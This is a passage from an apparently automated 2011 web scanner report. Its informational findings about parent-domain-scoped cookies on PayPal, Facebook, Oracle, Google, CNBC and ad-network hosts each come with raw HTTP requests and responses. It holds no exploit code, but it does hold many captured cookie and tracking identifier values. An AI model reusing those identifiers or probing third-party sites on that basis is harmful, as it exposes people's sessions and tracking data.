Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



12.17. https://cms.paypal.com/us/cgi-bin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /us/cgi-bin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cgi-bin/ HTTP/1.1
Host: cms.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8
Expires: Tue, 06 Sep 2011 17:06:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:24 GMT
Content-Length: 24992
Connection: close
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Mon, 01-Sep-2031 17:06:24 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...

12.18. http://developers.facebook.com/plugins/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.195.105
Connection: close
Date: Tue, 06 Sep 2011 17:06:31 GMT
Content-Length: 0


12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /cgi-bin/shopcart/viewcart.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/shopcart/viewcart.cgi HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: territoryCode=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: lang=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: org_id=1001; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: source=OU; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819944031981,1)
Date: Tue, 06 Sep 2011 15:59:33 GMT
Content-Length: 5316

<html>
<head>
<title>Oracle University: Empty Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<SCRIPT LANGUAGE="JavaScript">
var orgid = 1001;
var lan
...[SNIP]...

12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://education.oracle.com
Path:   /pls/web_prod-plq-dad/db_pages.getpage

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=402&p_nl=ORSL&intcmp=WWOCOMINTMAINPAGEBNR HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 6859
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Set-Cookie: p_cur_URL=0; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057867188663244,0)
Date: Tue, 06 Sep 2011 15:59:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=bVxkgLcqEicQGWCwjN0J7lK28lXRF1qOuXMwopVHzA=1szWgyw5SFrHzZqV; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5; expires=Wed, 07-Mar-2012 16:45:17 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 06 Sep 2011 16:45:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.22. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 204

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"><"+"/iframe"+">"
...[SNIP]...

12.23. http://imp.fetchback.com/serve/fb/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5114

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

12.24. https://login.cnbc.com/cas/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/logout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas/logout HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:04:31 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO2=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SUBSCRIBERINFO3=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ws=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: snas=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_member_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_session_id=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_ipb_pass_hash=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_sna=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: c_enc=; Domain=.cnbc.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://www.cnbc.com
Content-Language: en
Content-Length: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1


12.25. http://m1215.ic-live.com/522/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1215.ic-live.com
Path:   /522/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /522/?33083100&OVMTC=Broad&site=&creative=6492920360&OVKEY=beauty%20products&url_id=33083100 HTTP/1.1
Host: m1215.ic-live.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; sid1460=1315327539qIJ0arLZTDmI99; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/
Set-Cookie: sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.marykay.com/?pid=mk
Date: Tue, 06 Sep 2011 16:45:44 GMT
Set-Cookie: Coyote-2-a210828=a210872:0; path=/
Content-Length: 0


12.26. http://m1460.ic-live.com/586/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1460.ic-live.com
Path:   /586/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /586/?106159628&OVMTC=Phrase&site=&creative=9131745784&OVKEY=beauty%20product&url_id=106159628 HTTP/1.1
Host: m1460.ic-live.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid2=1315301244rR4cN0jX2yM1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/
Set-Cookie: sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
Date: Tue, 06 Sep 2011 16:45:40 GMT
Set-Cookie: Coyote-2-a210828=a210874:0; path=/
Content-Length: 0


12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc12059.247realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 HTTP/1.1
Host: oasc12059.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<script language="JavaScript" type="text/javascript" src="https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1735

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "2553663"
...[SNIP]...

12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2097

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1295153"
...[SNIP]...

12.30. http://optimized-by.rubiconproject.com/a/dk.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

